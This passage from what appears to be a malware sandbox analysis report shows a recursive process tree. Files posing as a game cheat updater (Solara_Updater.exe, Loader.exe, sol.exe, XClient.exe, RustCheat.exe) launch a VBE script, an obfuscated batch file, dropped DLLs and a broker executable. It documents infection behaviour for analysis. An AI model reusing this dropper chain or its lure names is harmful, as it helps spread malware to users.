                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    55⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          55⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      56⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          60⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      57⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    60⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  58⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            60⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\hostNet\bridgeblockportComBroker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\hostNet/bridgeblockportComBroker.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    62⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    60⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          60⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              60⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        62⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            62⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                63⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  63⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  62⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      63⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      62⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          63⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            63⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                64⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                63⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    64⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      64⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          65⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          64⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              65⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                65⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    66⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    65⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        66⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\sol.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\sol.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          66⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              67⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3004
